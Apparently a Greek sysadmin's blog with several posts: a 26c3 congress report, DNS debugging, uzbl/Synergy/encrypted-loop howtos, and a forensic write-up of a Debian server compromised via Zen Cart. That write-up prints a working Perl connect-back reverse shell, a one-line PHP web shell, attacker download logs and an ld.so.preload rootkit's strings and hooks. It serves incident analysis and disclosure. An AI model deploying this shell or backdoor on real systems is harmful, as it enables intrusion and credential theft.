The very first presentation we attended was “Here Be Electric Dragons“, and then we moved to see “Exposing Crypto bugs through reverse engineering“. After a break we tried to go to the “GSM: SRSLY?” lecture but it was SOO full that we were not allowed to go inside the presentation room. So we went to the “Tor and censorship: lessons learned” presentation which was more interesting than I expected. The final talks we saw on the first day were: “UNBILD – Pictures and Non-Pictures” which was in German and of course “cat /proc/sys/net/ipv4/fuckups“. Since none of us spoke German there was no urge to see the UNBILD lecture, but as we painfully understood by not being able to even enter the presentation room for the “GSM: SRSLY?” lecture, you have to go a LOT earlier to see a good lecture. We definetely wanted to see fabs lecture so we went there an hour earlier to find some seats. By the way, outside of the presentation rooms were TVs with live streaming from inside for people who couldn’t go inside or for people who didn’t want to. As I said earlier a lot of people preferred sitting at their projects’ infodesk and watched the streams of the presentations.

On the next day we saw: “Milkymist“, “Advanced microcontroller programming“, “Fuzzing the Phone in your Phone“, “Defending the Poor, Preventing Flash exploits“, “Haste ma’n netblock?” and “SCCP hacking, attacking the SS7 & SIGTRAN applications one step further and mapping the phone system“.

On the third day just “Playing with the GSM RF Interface“, “Using OpenBSC for fuzzing of GSM handsets” and “Black Ops Of PKI” since we decided to do some sightseeing as well 🙂

Finally on the last day we went to “secuBT” and from that to another German lecture about a distributed portscanner called Wolpertinger that replaced a canceled lecture on IBM AS/400. Afterwards we went to the realtime English translation stream of “Security Nightmares” and to the “Closing Event“.

I had a really great time and I certainly want to be there again next year. If I manage to go there again though I will try take a lot more days off work so I can visit many more places around the city. The whole event was excellent, the organization was almost perfect and the people who contributed to it deserve a huge applaud, especially the angels.

Congratulations to all.

Necessary pics:
lounge Room 1
FX presentation BCC at night
Pirate Flags BCC with snow
Closing EventThe Greeks

P.S. I don’t want to go into specific details about the lectures I attended. Some were REALLY good, some were average and some were totally boring. If you follow the news you already know which streams of lectures you should certainly download and see. You can find every lecture on CCC’s FTP server.

P.S.2 What a great wiki for an event…I was amazed by the amount of information one can find in there…

P.S.3 To Greeks only…please download the closing event presentation to see how we should start organizing events. Just check on the efforts of the people who contributed to the 26c3 event. I don’t want to write anything more about this issue because the difference with any Greek event I’ve ever attended to, or even the mentality of the people attending “our” events is SO SO SO HUUUUGE that it makes me really sad. I hope that this might fire up something. If more Greeks attended events organized abroad then maybe one day we might get more serious about our events as well.

Epic fail from a hosting company involving bad customer support and a critical security issue

To cut the story as short as possible let’s say that someone rents some dedicated servers somewhere in a big hosting company. I occasionally do some administrative tasks for him.
A server stopped responding and was unbootable on October 1st, one disk had crashed, then the hosting company did a huge mistake, I notified them about it and then they did another even bigger mistake (security issue) on the next day, October 2nd. I re-notified them about it…
So you can either read the whole story or if you are only interested on the security issue, skip the first day and go straight to October 2nd.

Some details, the server had 2 disks, sda with the OS (Debian 4.0) with Plesk control panel and sdb which had some backup files.

October 1st 2009:
10:10 I got a telephone call to help on that server because it looked dead and it couldn’t even be rebooted from the hosting’s company control panel.
10:15 I contacted the company’s support by email and notified them of the problem.
(more…)

resolv.conf options rotate and discovery of ISP DNS issue

Lately I somehow bumped on the manpage of resolv.conf. While reading it I saw the following really nice option:

rotate               sets  RES_ROTATE  in _res.options, which causes round robin selection of name‐
                     servers from among those listed.  This has the effect of spreading  the  query
                     load  among  all  listed servers, rather than having all clients try the first
                     listed server first every time.

Since then my /etc/resolv.conf on both Gentoo and Debian looks like that:
nameserver 194.177.210.10
nameserver 194.177.210.210
nameserver 194.177.210.211
options rotate

(I prefer using GrNET‘s DNS servers than any others in Greece, especially for my laptop configuration. Since they allow recursion I can use them to avoid lousy DNS services provided by lousy DSL routers regardless of the ISP I am currently using, when I am “mobile” with my laptop.)

While using the following config I issued a ping command on a teminal and a tcpdump command on another to see what was actually happening. The result looked like this:
root@lola:~# tcpdump -ni eth1 port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
11:20:46.405694 IP 192.168.1.65.55154 > 194.177.210.210.53: 39212+ A? ntua.gr. (25)
11:20:46.444266 IP 194.177.210.210.53 > 192.168.1.65.55154: 39212* 1/5/8 A 147.102.222.210 (319)
11:20:46.484490 IP 192.168.1.65.56152 > 194.177.210.211.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.584171 IP 194.177.210.211.53 > 192.168.1.65.56152: 50452 ServFail 0/0/0 (46)
11:20:46.584449 IP 192.168.1.65.58597 > 194.177.210.10.53: 50452+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:46.624179 IP 194.177.210.10.53 > 192.168.1.65.58597: 50452 1/7/6 (357)
11:20:47.484420 IP 192.168.1.65.32818 > 194.177.210.10.53: 33179+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:47.524176 IP 194.177.210.10.53 > 192.168.1.65.32818: 33179 1/7/6 (357)
11:20:48.484483 IP 192.168.1.65.57670 > 194.177.210.210.53: 21949+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:48.524184 IP 194.177.210.210.53 > 192.168.1.65.57670: 21949 1/3/6 (271)
11:20:49.487610 IP 192.168.1.65.48966 > 194.177.210.211.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.534204 IP 194.177.210.211.53 > 192.168.1.65.48966: 8619 ServFail 0/0/0 (46)
11:20:49.534429 IP 192.168.1.65.49421 > 194.177.210.10.53: 8619+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:49.574138 IP 194.177.210.10.53 > 192.168.1.65.49421: 8619 1/7/6 (357)
11:20:50.494537 IP 192.168.1.65.52525 > 194.177.210.10.53: 3415+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:50.534145 IP 194.177.210.10.53 > 192.168.1.65.52525: 3415 1/7/6 (357)
11:20:51.494552 IP 192.168.1.65.40400 > 194.177.210.210.53: 4504+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:51.534205 IP 194.177.210.210.53 > 192.168.1.65.40400: 4504 1/3/6 (271)
11:20:52.494554 IP 192.168.1.65.42385 > 194.177.210.211.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.544197 IP 194.177.210.211.53 > 192.168.1.65.42385: 48450 ServFail 0/0/0 (46)
11:20:52.544409 IP 192.168.1.65.43773 > 194.177.210.10.53: 48450+ PTR? 210.222.102.147.in-addr.arpa. (46)
11:20:52.584232 IP 194.177.210.10.53 > 192.168.1.65.43773: 48450 1/7/6 (357)

People who are used to reading tcpdump output will immediately point out the ServFail entries of the log. Server 194.177.210.211 refused to provide proper results for the PTR query of 210.222.102.147.in-addr.arpa.

Further investigation of the problem:

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.210
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 66841 IN  PTR achilles.noc.ntua.gr.

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.211
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR

root@lola:~# dig ptr 210.222.102.147.in-addr.arpa @194.177.210.10
;; QUESTION SECTION:
;210.222.102.147.in-addr.arpa.  IN  PTR
;; ANSWER SECTION:
210.222.102.147.in-addr.arpa. 86115 IN  PTR achilles.noc.ntua.gr.

It was obvious that 2 out of 3 DNS servers responded as they should and the other did not.

What I did was to notify a friend working as an administrator there (GrNET) and let him know of the problem. After some investigation, he later on told me that the problem was related to dnssec issues. Possibly a configuration error on RIPE‘s side. As far as I know they had to temporarily disable dnssec on the 147.102 zone…I am not aware whether they fixed the problem (using dnssec) yet though.

I am really glad they acted as fast as possible regarding the solution of the problem 🙂

Uzbl to you too!

I’ve been trying uzbl for the last few days and I am pretty much impressed on how useful such a small application can be in certain usage cases!

I installed it on my Debian testing using the following blog post: Installing uzbl on Debian Squeeze .
Be sure to make install else you’ll have no config and uzbl will be unusable!!!

The first place I used it was for the urlLauncher plugin of urxvt. On my .Xdefaults I have the following piece of code:
urxvt.perl-ext-common: default,matcher,-option-popup,-selection-popup,-realine
urxvt.matcher.button: 1
urxvt.urlLauncher: /usr/local/bin/urxvt-url.sh

and my /usr/local/bin/urxvt-url.sh contains:
#!/bin/sh
uzbl "$1"

Now every url on the console get’s highlighted and I can open it with uzbl. And that means opening really fast!

Example:
urxvt terminal (tabbed by fluxbox) with some urls highlighted by the perl matcher plugin of urxvt:
urxvt-url-highlight

left clicking on one of the urls opens it with uzbl:
uzbl-window

Apart from that, I’ve started using uzbl to open links on instant messengers, IRC clients and in every other place that people send me simple links to check out or I need a fast browser instance. Some people might say that it looks like links2 graphical mode, but it’s NOT like opening urls with “links -G” because uzbl is based on webkit and that means it can deal with javascript, java, flash, whatever…

I just love the way you can keybind all the actions you want on it…on the example config that comes with it, you quit the browser by typing ZZ…how great is that ? 😀

Some usage tips
1) Tabbed behavior (if you have fluxbox):
In ~/.config/uzbl/config add
bind t _ = spawn uzbl --uri %s
and in ~/.fluxbox/apps add the [group] tag before the [app] tag for uzbl like that:

[group]
 [app] (name=uzbl) (class=Uzbl)
  [Workspace]   {0} 
  [Head]    {0} 
  [Dimensions]  {800 1284}
  [Position]    (UPPERLEFT) {0 0}
  [Maximized]   {yes}
  [Jump]    {yes}
  [Close]   {yes}
[end]

Now the command t www.google.com inside uzbl, will open a new tabbed window of uzbl with www.google.com loaded in it.

2) Close uzbl window with ctrl+w
In ~/.config/uzbl/config add:

bind     ctrl+v ctrl+w    = exit

(press ctrl+v ctrl+w one after the other and you will get something like ^W in the file)

P.S. If you are a person that just came from the point and click windows world to the beautiful world of linux, or you are a person that loves bloated desktop managers like KDE/gnome/etc or bloated applications like firefox/iceweasel/konqueror don’t even think of installing it. You’ll never understand its value…
P.S.2. If Richard Stallman decided to browse the web and had an internet connection uzbl would probably be his browser of choice 😛

Playing with Synergy on Gentoo and Debian

I currently have Gentoo/x86 on my desktop system and Debian/testing on my laptop. I wanted a way to be able to use the laptop’s trackpad to control the cursor on the desktop or to use the desktop’s mouse to control the cursos on the laptop. Thankfully I was able to do that with Synergy.

On Gentoo:
# emerge x11-misc/synergy
On Debian:
# aptitude install synergy

My config is pretty simple. That’s Debian’s (hostname lola) /etc/synergy.conf:

section: screens
    lola:
    athlios:
end

section: links
    lola:
        right = athlios
    athlios:
        left  = lola
end

section: aliases
    lola:
        mac 
end

When I want to control athlios (desktop) from lola (laptop), I start synergys on lola, ssh to athlios and start synergyc lola. That’s it, I can then control desktop’s mouse and keyboard from laptop’s touchpad and keyboard. When I move the lola’s cursor far to the right, the cursor starts moving on the desktop. Then if I start typing on the laptop’s keyboard I am actually typing on the desktop. Moving the cursor far to the left of the desktop’s monitor, the cursor starts moving again on the laptop.

A problem that I faced was that some keys (Left and Down arrow) stop repeating if you press them continuously when you start synergyc. The solution is posted on the synergy article on gentoo wiki. You just have to type: xset r 113 (left arrow) and xset r 116 (down arrow) to activate them, then move your mouse to the synergy server and back to the synergy client. If you try typing on the machine where the synergy client has started using its keyboard you will see that repeating doesn’t work at all. Just type xset r to get it back working if you need it.

For people having more than one machine on their desk, synergy is a real salvation in order to stop switching keyboards and mice all the time.

how to use encrypted loop files with a gpg passphrase in Debian

Fast howto (mostly a note for personal use) on what’s needed on Debian to use an encrypted loop:

1. The necessary utilities (patched losetup)
# aptitude install loop-aes-utils
2. The necessary kernel-module
# aptitude install loop-aes-modules-2.6.30-1-686-bigmem
3. Create the keyfile (keep your computer as busy as possible while doing this to increase entropy)
# head -c 2925 /dev/urandom | uuencode -m - | head -n 66 | tail -n 65| gpg --symmetric -a >/path/to/keyfile.gpg
4. Loopfile creation (10Mb)
# dd if=/dev/urandom of=/my-encrypted-loop.aes bs=1k count=10000
5. Initialize loopfile
# losetup -K /path/to/keyfile.gpg -e AES256 /dev/loop5 /home/username/crypto-loop.img
6. Format loopfile
# mke2fs /dev/loop5
7. Delete loop device
# losetup -d /dev/loop5
8. Create mount point for loopfile
# mkdir /mnt/crypto-loop
9. Add entry to fstab

/home/username/crypto-loop.img /mnt/crypt-loop ext2 defaults,noauto,user,loop=/dev/loop7,encryption=AES256,gpgkey=/path/to/keyfile.gpg 0 0

10. Try mounting the loopfile as user
$ mount /mnt/crypto-loop
11. Check it’s mounted properly
$ mount | grep -i aes

and use it!

P.S. Secure your keyfile.gpg, if it gets lost you won’t _ever_ be able to decrypt what was inside crypto-loop.img!

There’s a rootkit in the closet!

Part 1: Finding the rootkit

It’s monday morning and I am for coffee in downtown Thessaloniki, a partner calls:
– On machine XXX mysqld is not starting since Saturday.
– Can I drink my coffee and come over later to check it ? Is it critical ?
– Nope, come over anytime you can…

Around 14:00 I go over to his company to check on the box. It’s a debian oldstable (etch) that runs apache2 with xoops CMS + zencart (version unknown), postfix, courier-imap(s)/pop3(s), bind9 and mysqld. You can call it a LAMP machine with a neglected CMS which is also running as a mailserver…

I log in as root, I do a ps ax and the first thing I notice is apache having more than 50 threads running. I shut apache2 down via /etc/init.d/apache2 stop. Then I start poking at mysqld. I can’t see it running on ps so I try starting it via the init.d script. Nothing…it hangs while trying to get it started. I suspect a failing disk so I use tune2fs -C 50 /dev/hda1 to force an e2fck on boot and I reboot the machine. The box starts booting, it checks the fs, no errors found, it continues and hangs at starting mysqld. I break out of the process and am back at login screen. I check the S.M.A.R.T. status of the disk via smartctl -a /dev/hda, all clear, no errors found. Then I try to start mysqld manually, it looks like it starts but when I try to connect to it via a mysql client I get no response. I try to move /var/lib/mysql/ files to another location and to re-init the mysql database. Trying to start mysqld after all that, still nothing.

Then I try to downgrade mysql to the previous version. Apt-get process tries to stop mysqld before it replaces it with the older version and it hangs, I try to break out of the process but it’s impossible…after a few killall -9 mysqld_safe;killall -9 mysql; killall -9 mysqladmin it finally moves on but when it tries to start the downgraded mysqld version it hangs once again. That’s totally weird…

I try to ldd /usr/sbin/mysqld and I notice a very strange library named /lib/ld-linuxv.so.1 in the output. I had never heard of that library name before so I google. Nothing comes up. I check on another debian etch box I have for the output of ldd /usr/sbin/mysqld and no library /lib/ld-linuxv.so.1 comes up. I am definitely watching something that it shouldn’t be there. And that’s a rootkit!

I ask some friends online but nobody has ever faced that library rootkit before. I try to find that file on the box but it’s nowhere to be seen inside /lib/…the rootkit hides itself pretty well. I can’t see it with ls /lib or echo /lib/*. The rootkit has probably patched the kernel functions that allow me to see it. Strangely though I was able to see it with ldd (more about the technical stuff on the second half of the post). I try to check on some other executables in /sbin with a for i in /usr/sbin/*;do ldd $i; done, all of them appear to have /lib/ld-linuxv.so.1 as a library dependency. I try to reboot the box with another kernel than the one it’s currently using but I get strange errors that it can’t even find the hard disk.

I try to downgrade the “working” kernel in an attempt of booting the box cleanly without the rootkit. I first take backups of the kernel and initramfs which are about to be replaced of course. When apt-get procedure calls mkinitramfs in order to create the initramfs image I notice that there are errors saying that it can’t delete /tmp/mkinitramfs_UVWXYZ/lib/ld-linuxv.so.1 file, so rm fails and that makes mkinitramfs fail as well.

I decide that I am doing more harm than good to the machine at the time and that I should first get an image of the disk before I fiddle any more with it. So I shut the box down. I set up a new box with most of the services that should be running (mail + dns), so I had the option to check on the disk with the rootkit on my own time.

Part 2: Technical analysis
I. First look at the ld-linuxv.so.1 library

A couple of days later I put the disk to my box and made an image of each partition using dd:
dd if=/dev/sdb1 of=/mnt/image/part1 bs=64k

Then I could mount the image using loop to play with it:
mount -o loop /mnt/image/part1 /mnt/part1

A simple ls of /mnt/part1/lib/ revealed that ld-linuxv.so.1 was there. I run strings to it:
# strings /lib/ld-linuxv.so.1
__gmon_start__
_init
_fini
__cxa_finalize
_Jv_RegisterClasses
execve
dlsym
fopen
fprintf
fclose
puts
system
crypt
strdup
readdir64
strstr
__xstat64
__errno_location
__lxstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
vasprintf
getspnam_r
getspnam
getpwnam
pam_authenticate
inssh
gotpass
__libc_start_main
logit
setuid
setgid
seteuid
setegid
read
fwrite
accept
htons
doshell
doconnect
fork
dup2
stdout
fflush
stdin
fscanf
sleep
exit
waitpid
socket
libdl.so.2
libc.so.6
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1.3
GLIBC_2.1
root
@^_]
`^_]
ld.so.preload
ld-linuxv.so.1
_so_cache
execve
/var/opt/_so_cache/ld
%s:%s
Welcome master
crypt
readdir64
__xstat64
__lxstat64
opendir
login
pututline
open64
lastlog
pam_open_session
pam_close_session
syslog
getspnam_r
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
getspnam
getpwnam
root
/dev/null
normal
pam_authenticate
pam_get_item
Password:
__libc_start_main
/var/opt/_so_cache/lc
local
/usr/sbin/sshd
/bin/sh
read
write
accept
/usr/sbin/crond
HISTFILE=/dev/null
%99s
$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0
/bin/sh

As one can easily see there’s some sort of password hash inside and references to /usr/sbin/sshd, /bin/sh and setting HISTFILE to /dev/null.

I took the disk image to my friend argp to help me figure out what exactly the rootkit does and how it was planted to the box.

II. What the rootkit does

Initially, while casually discussing the incident, kargig and myself (argp) we thought that we had to do with a kernel rootkit. However, after carefully studying the disassembled dead listing of ld-linuxv.so.1, it became clear that it was a shared library based rootkit. Specifically, the intruder created the /etc/ld.so.preload file on the system with just one entry; the path of where he saved the ld-linuxv.so.1 shared library, namely /lib/ld-linuxv.so.1. This has the effect of preloading ld-linuxv.so.1 every single time a dynamically linked executable is run by a user. Using the well-known technique of dlsym(RTLD_NEXT, symbol), in which the run-time address of the symbol after the current library is returned to allow the creation of wrappers, the ld-linuxv.so.1 shared library trojans (or hijacks) several functions. Below is a list of some of the functions the shared library hijacks and brief explanations of what some of them do:
crypt
readdir64
__xstat64
__l xstat64
opendir
login
pututline
open64
pam_open_session
pam_close_session
syslog
getspnam_r
getspnam
getpwnam
pam_authenticate
pam_get_item
__libc_start_main
read
write
accept

The hijacked accept() function sends a reverse, i.e. outgoing, shell to the IP address that initiated the incoming connection at port 80 only if the incoming IP address is a specific one. Afterwards it calls the original accept() system call. The hijacked getspnam() function sets the encrypted password entry of the shadow password structure (struct spwd->sp_pwdp) to a predefined hardcoded value (“$1$UFJBmQyU$u2ULoQTJbwDvVA70ocLUI0”). The hijacked read() and write() functions of the shared library wrap the corresponding system calls and if the current process is ssh (client or daemon), their buffers are appended to the file /var/opt/_so_cache/lc for outgoing ssh connections, or to /var/opt/_so_cache/ld for incoming ones (sshd). These files are also kept hidden using the same approach as described above.

III. How the rootkit was planted in the box

While argp was looking at the objdump output, I decided to take a look at the logs of the server. The first place I looked was the apache2 logs. Opening /mnt/part1/var/log/apache2/access.log.* didn’t provide any outcome at first sight, nothing really striking out, but when I opened /mnt/part1/var/log/apache2/error.log.1 I faced these entries at the bottom:

–01:05:38– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:05:51– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 18.61 MB/s

01:05:51 (18.61 MB/s) – `foobar.ext’ saved [695/695]

–01:17:14– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]
foobar.ext: Permission denied

Cannot write to `foobar.ext’ (Permission denied).
–01:17:26– http://ABCDEFGHIJ.150m.com/foobar.ext
=> `foobar.ext’
Resolving ABCDEFGHIJ.150m.com… 209.63.57.10
Connecting to ABCDEFGHIJ.150m.com|209.63.57.10|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 695 [text/plain]

0K 100% 25.30 MB/s

01:17:26 (25.30 MB/s) – `foobar.ext’ saved [695/695]

So this was the entrance point. Someone got through a web app to the box and was able to run code.
I downloaded “foobar.ext” from the same url and it was a perl script.

#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor Unpublished/Unreleased Source
# Code

use Socket;

print “[*] Dumping Arguments\n”;

$host = “A.B.C.D”;
$port = XYZ;

if ($ARGV[1]) {
$port = $ARGV[1];
}
print “[*] Connecting…\n”; $proto = getprotobyname(‘tcp’) || die(“[-] Unknown Protocol\n”);

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (“[-] Socket Error\n”);

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4x8”, 2, $port, $target)) {
die(“[-] Unable to Connect\n”);
}
print “[*] Spawning Shell\n”;

if (!fork( )) {
open(STDIN,”>&SERVER”);
open(STDOUT,”>&SERVER”);
open(STDERR,”>&SERVER”);
exec {‘/bin/sh’} ‘-bash’ . “\0” x 4;
exit(0);
}

Since I got the time when foobar.ext was downloaded I looked again at the apache2 access.log to see what was going on at the time.
Here are some entries:

A.B.C.D – – [15/Aug/2009:01:05:33 +0300] “GET http://www.domain.com/admin/ HTTP/1.1” 302 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “POST http://www.domain.com/admin/record_company.php/password_forgotten.php?action=insert HTTP/1.1” 200 303 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:34 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 131 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:38 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:47 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 52 “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:50 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 – “-” “Mozilla Firefox”
A.B.C.D – – [15/Aug/2009:01:05:51 +0300] “GET http://www.domain.com/images/imagedisplay.php HTTP/1.1” 200 59 “-” “Mozilla Firefox”

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this: Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Part 3: Conclusion and food for thought
To conclude on what happened:
1) The attacker used the zencart vulnerability to create the imagedisplay.php file.
2) Using the imagedisplay.php file he was able to make the server download foobar.ext from his server.
3) Using the imagedisplay.php file he was able to run the server run foobar.ext which is a reverse shell. He could now connect to the machine.
4) Using some local exploit(s) he was probably able to become root.
5) Since he was root he uploaded/compiled ld-linuxv.so.1 and he created /etc/ld.so.preload. Now every executable would first load this “trojaned” library which allows him backdoor access to the box and is hidding from the system. So there is his rootkit 🙂

Fortunately the rootkit had problems and if /var/opt/_so_cache/ directory was not manually created it couldn’t write the lc and ld files inside it. If you created the _so_cache dir then it started logging.

If there are any more discoveries about the rootkit they will be posted in a new post. If someone else wants to analyze the rootkit I would be more than happy if he/she put a link to the analysis as a comment on this blog.

Part 4: Files

In the following tar.gz you will find the ld-linuxv.so.1 library and the perl script foobar.ext (Use at your own risk. Attacker’s host/ip have been removed from the perl script):linuxv-rootkit.tar.gz

Many many thanks to argp of Census Labs